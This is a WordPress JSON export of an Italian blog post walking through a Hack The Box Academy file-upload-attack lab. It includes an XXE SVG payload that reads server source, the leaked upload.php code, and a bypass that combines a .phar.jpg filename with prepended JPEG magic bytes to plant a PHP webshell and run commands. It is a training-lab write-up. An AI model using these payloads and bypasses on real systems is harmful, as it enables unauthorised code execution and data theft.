{"id":2520,"date":"2022-02-13T22:24:24","date_gmt":"2022-02-13T21:24:24","guid":{"rendered":"http:\/\/www.olografix.org\/frank\/wordpress\/?p=2520"},"modified":"2022-02-13T22:36:30","modified_gmt":"2022-02-13T21:36:30","slug":"f-u-a","status":"publish","type":"post","link":"https:\/\/olografix.sugodipesce.net\/frank\/wordpress\/?p=2520","title":{"rendered":"F.u.A."},"content":{"rendered":"\n

ho trovato una motivazione per essere felice\/stimolato: ormai mi “drogo” con moduli su academy.hackthebox.com<\/a> \ud83d\ude42<\/p>\n\n\n\n

vediamo l'”esame finale” di questo interessantissimo modulo.<\/p>\n\n\n\n

obiettivo del gioco: accedere al flag <\/em>sul filesystem di questo webserver:<\/p>\n\n\n\n

<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

la parte pi\u00c3\u00b9 interessante \u00c3\u00a8 chiaramente “Contact Us”:<\/p>\n\n\n\n

<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

iniziamo con le cose semplici, e vediamo come va a finire con un’immagine qualunque:<\/p>\n\n\n\n

<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

il file viene caricato con successo:<\/p>\n\n\n\n

<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

ma.. non sembra immediato capire “dove” sia andato a finire:<\/p>\n\n\n\n

<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

tentativi banali come \/upload\/nomefile<\/code>, \/uploads\/nomefile<\/code>, etc.. non hanno portato a nulla.<\/p>\n\n\n\n

proviamo (tentativo disperato) ad uploadare una webshell in PHP. tra parentesi, sembra esserci un controllo client-side sui tipi di files ammessi:<\/p>\n\n\n\n

<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

che fa il paio con:<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

by the way, veniamo chiaramente inculati:<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

cerchiamo di indagare su quale sia lo script php che si “occupa” di fare l’upload, con l’inseparabile Burp:<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

vediamo se riusciamo a ottenere in chiaro<\/em> il codice di upload.php<\/code> tramite XXE.<\/p>\n\n\n\n

creiamo un file .svg con questo contenuto:<\/p>\n\n\n\n

<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE svg [ <!ENTITY xxe SYSTEM \"php:\/\/filter\/convert.base64-encode\/resource=upload.php\"> ]>\n<svg>&xxe;<\/svg>\n<\/code><\/pre>\n\n\n\n
prima di farlo, tramite l’inspector del browser, togliamo di mezzo quei controlli, ossia:<\/p>\n\n\n\n
onchange=\"checkFile(this)\" accept=\".jpg,.jpeg,.png\"<\/code><\/p>\n\n\n\n
carichiamo il file svg:<\/p>\n\n\n\n
<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
e godiamoci il risultato:<\/p>\n\n\n\n
<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
quel blocco encodato in base64 contiene il codice php del file upload.php<\/code>.<\/p>\n\n\n\n
# cat upload.php | base64 -d\n<?php\nrequire_once('.\/common-functions.php');\n\n\/\/ uploaded files directory\n$target_dir = \".\/user_feedback_submissions\/\";\n\n\/\/ rename before storing\n$fileName = date('ymd') . '_' . basename($_FILES[\"uploadFile\"][\"name\"]);\n$target_file = $target_dir . $fileName;\n\n\/\/ get content headers\n$contentType = $_FILES['uploadFile']['type'];\n$MIMEtype = mime_content_type($_FILES['uploadFile']['tmp_name']);\n\n\/\/ blacklist test\nif (preg_match('\/.+\\.ph(p|ps|tml)\/', $fileName)) {\n    echo \"Extension not allowed\";\n    die();\n}\n\n\/\/ whitelist test\nif (!preg_match('\/^.+\\.[a-z]{2,3}g$\/', $fileName)) {\n    echo \"Only images are allowed\";\n    die();\n}\n\n\/\/ type test\nforeach (array($contentType, $MIMEtype) as $type) {\n    if (!preg_match('\/image\\\/[a-z]{2,3}g\/', $type)) {\n        echo \"Only images are allowed\";\n        die();\n    }\n}\n\n\/\/ size test\nif ($_FILES[\"uploadFile\"][\"size\"] > 500000) {\n    echo \"File too large\";\n    die();\n}\n\nif (move_uploaded_file($_FILES[\"uploadFile\"][\"tmp_name\"], $target_file)) {\n    displayHTMLImage($target_file);\n} else {\n    echo \"File failed to upload\";\n}\n<\/code><\/pre>\n\n\n\n
la prima scoperta interessante \u00c3\u00a8 il path di dove vengono salvate le immagini:<\/p>\n\n\n\n
$target_dir = \".\/user_feedback_submissions\/\";<\/code><\/p>\n\n\n\n
nonch\u00c3\u00a9 il come vengono rinominati i files:<\/p>\n\n\n\n
$fileName = date('ymd') . '_' . basename($_FILES[\"uploadFile\"][\"name\"]); $target_file = $target_dir . $fileName;<\/code><\/p>\n\n\n\n
come controprova, verifichiamo con il nostro Mario kart di prima \ud83d\ude42<\/p>\n\n\n\n
<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
CVD!<\/p>\n\n\n\n
next, avendo in chiaro anche il meccanismo di blacklist E whitelist, possiamo fare dei test.<\/p>\n\n\n\n
partiamo da una jpg “vera” qualsiasi (giusto per non rimettere mano all’inspector del browser per togliere i javascript \ud83d\ude42<\/p>\n\n\n\n
<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
e intercettiamo l’upload:<\/p>\n\n\n\n
<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
proviamo a cambiare il nome del file e il contenuto dello stesso con una web shell semplicissima:<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
veniamo inculati:<\/p>\n\n\n\n
<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
ma noi questo lo sapevamo gi\u00c3\u00a0, perch\u00c3\u00a9 abbiamo triggerato la “blacklist” (il nostro file contiene “.php<\/code>“)<\/p>\n\n\n\n
if (preg_match('\/.+\\.ph(p|ps|tml)\/', $fileName)) {\n    echo \"Extension not allowed\";\n    die();<\/code><\/pre>\n\n\n\n
la blacklist di cui sopra, tuttavia, consente di uploadare un file con estensione .phar<\/strong><\/code> che, pu\u00c3\u00b2 portare comunque ad esecuzione di codice PHP, se assumiamo che la conf del web server sia:<\/p>\n\n\n\n
<FilesMatch \".+\\.ph(ar|p|tml)\">\n    SetHandler application\/x-httpd-php\n<\/FilesMatch>\n<\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
come si vede, l’errore \u00c3\u00a8 diverso: adesso abbiamo superato la blacklist, ma abbiamo triggerato la whitelist <\/p>\n\n\n\n
\/\/ whitelist test\nif (!preg_match('\/^.+\\.[a-z]{2,3}g$\/', $fileName)) {\n    echo \"Only images are allowed\";\n    die();\n}\n\n<\/code><\/pre>\n\n\n\n
la whitelist di cui sopra \u00c3\u00a8 fatta un po’ meglio della blacklist, perch\u00c3\u00a9 consente solo i file il cui nome finisce <\/strong>con quella regexp (mentre la blacklist verifica solo se contiene <\/strong>o meno la regexp).<\/p>\n\n\n\n
riproviamo dunque con pac.phar.jpg<\/code>:<\/p>\n\n\n\n
<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\"\"<\/figure>\n\n\n\n
A questo punto non \u00c3\u00a8 chiaro al 100% se abbiamo superato la whitelist, perch\u00c3\u00a9 l’errore, anche nella terza condizione, \u00c3\u00a8 sempre “Only images are allowed<\/code>“:<\/p>\n\n\n\n
\/\/ whitelist test\nif (!preg_match('\/^.+\\.[a-z]{2,3}g$\/', $fileName)) {\n    echo \"Only images are allowed<\/strong>\";\n    die();\n}\n\n\/\/ type test\nforeach (array($contentType, $MIMEtype) as $type) {\n    if (!preg_match('\/image\\\/[a-z]{2,3}g\/', $type)) {\n        echo \"Only images are allowed<\/strong>\";\n        die();\n    }\n}<\/code><\/pre>\n\n\n\n
tuttavia, grazie a questo link<\/a>:<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
sembra che abbiamo bypassato la whitelist.<\/p>\n\n\n\n
dobbiamo quindi superare il terzo controllo; dobbiamo presupporre che dopo l’upload venga effettuato un check sul tipo di file<\/em>.<\/p>\n\n\n\n
Dobbiamo quindi far creare al controllo lato-server che si tratti di una jpeg, anche se di fatto non lo \u00c3\u00a8.<\/p>\n\n\n\n
possiamo trovare un po’ ovunque i “magic bytes” per i vari tipi di file, es.<\/p>\n\n\n\n
https:\/\/gist.github.com\/leommoore\/f9e57ba2aa4bf197ebc5<\/a><\/p>\n\n\n\n
nel nostro caso dobbiamo far s\u00c3\u00ac che il contenuto esadecimale del nostro file inizi con:<\/p>\n\n\n\n
ff d8 ff e0<\/code><\/pre>\n\n\n\n
grazie a hexedit<\/code>, modifichiamo dunque l'”incipit” della webshell aggiungendo i bytes di cui sopra, ottenendo alla fine:<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
il comando file <\/code>sembra darci ragione sul fatto che sia veramente <\/em>una jpeg:<\/p>\n\n\n\n
root@kaligra:\/home\/joshua\/academy\/file_upload_attacks# file webshell.phar.jpg\nwebshell.phar.jpg: JPEG image data\n<\/code><\/pre>\n\n\n\n
a questo punto, dopo aver avuto un’idea completa dei controlli lato client (javascript) e lato server (controlli tramite PHP), possiamo prendere il nostro file webshell.phar.jpg<\/code> e uploadarlo indisturbati:<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\"\"<\/figure>\n\n\n\n
vediamo se \u00c3\u00a8 stato caricato correttamente:<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
mm, c’\u00c3\u00a8 qualcosa (non un errore “Not found” \ud83d\ude42<\/p>\n\n\n\n
a questo punto, possiamo interagire con la nostra webshell, passandogli il parametro cmd <\/code>e il comando desiderato:<\/p>\n\n\n\n
<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
game over *<\/p>\n\n\n\n
<\/p>\n","protected":false},"excerpt":{"rendered":"
ho trovato una motivazione per essere felice\/stimolato: ormai mi “drogo” con moduli su academy.hackthebox.com \ud83d\ude42 vediamo l’”esame finale” di questo interessantissimo modulo. obiettivo del gioco: accedere al flag sul filesystem di questo webserver: la parte pi\u00c3\u00b9 interessante \u00c3\u00a8 chiaramente “Contact Us”: iniziamo con le cose semplici, e vediamo come va a finire con un’immagine qualunque: […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[16,2,19],"tags":[],"class_list":["post-2520","post","type-post","status-publish","format-standard","hentry","category-activity_log","category-tmrc","category-walkthrough"],"_links":{"self":[{"href":"https:\/\/olografix.sugodipesce.net\/frank\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/2520","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/olografix.sugodipesce.net\/frank\/wordpress\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/olografix.sugodipesce.net\/frank\/wordpress\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/olografix.sugodipesce.net\/frank\/wordpress\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/olografix.sugodipesce.net\/frank\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2520"}],"version-history":[{"count":10,"href":"https:\/\/olografix.sugodipesce.net\/frank\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/2520\/revisions"}],"predecessor-version":[{"id":2556,"href":"https:\/\/olografix.sugodipesce.net\/frank\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/2520\/revisions\/2556"}],"wp:attachment":[{"href":"https:\/\/olografix.sugodipesce.net\/frank\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2520"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/olografix.sugodipesce.net\/frank\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2520"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/olografix.sugodipesce.net\/frank\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2520"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}